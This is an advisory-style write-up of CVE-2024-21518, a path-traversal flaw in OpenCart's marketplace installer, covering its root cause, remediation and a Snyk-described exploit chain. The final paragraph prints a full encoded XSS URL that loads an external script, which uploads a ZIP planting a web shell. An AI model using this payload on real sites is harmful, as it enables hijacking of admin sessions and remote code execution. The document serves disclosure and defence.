CVE-2024-21518

An attacker crafts a malicious ZIP archive containing files with path traversal sequences (e.g., `../../oc.php`) in their entry names. The attacker must first achieve admin-level access to the OpenCart backend; the Snyk advisory demonstrates chaining this with a stored XSS vulnerability to trick an authenticated admin into uploading the malicious archive [ref_id=2]. Once uploaded via the marketplace installer, the insufficient path sanitization causes the archive extraction to write files outside the intended directory, allowing the attacker to place a web shell (e.g., `oc.php`) in the web root and achieve remote code execution [CWE-22][CWE-29].

The vulnerability resides in the marketplace installer component of OpenCart, specifically in the archive extraction logic that handles uploaded extension packages. The code does not properly sanitize path components within archive entries, allowing filenames containing directory traversal sequences (e.g., `../`) to escape the intended extraction directory. The exact file path is not shown in the advisory, but the installer's upload and install routes (`route=marketplace/installer.upload` and `route=marketplace/installer.install`) are the entry points [ref_id=2].

The Snyk advisory states that no fixed version has been released for opencart/opencart as of the disclosure date [ref_id=2]. The recommended remediation would be to add validation that rejects archive entry names containing `../` or `..\` sequences, and to ensure the resolved extraction path remains within the intended base directory. Without an official patch, administrators should restrict access to the marketplace installer functionality and avoid uploading extension packages from untrusted sources.

The Snyk advisory includes a full exploit chain [ref_id=2]. An attacker first sends an XSS URL to an admin: `https://mywebstore.com/admin/index.php?route=common/filemanager.list&directory=demo%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252Flocalhost%253A8000%252Foc.js%2522%253E%253C%252Fscript%253E%253Cinput%2Btype%253D%2522hidden`. Upon login, the admin is redirected to that URL with a `user_token`. The XSS payload (hosted at `http://localhost:8000/oc.js`) base64-decodes a malicious ZIP containing `../../oc.php` and `install.json`, uploads it via `route=marketplace/installer.upload`, then iterates through install IDs calling `route=marketplace/installer.install` until the web shell at `/oc.php` returns HTTP 200.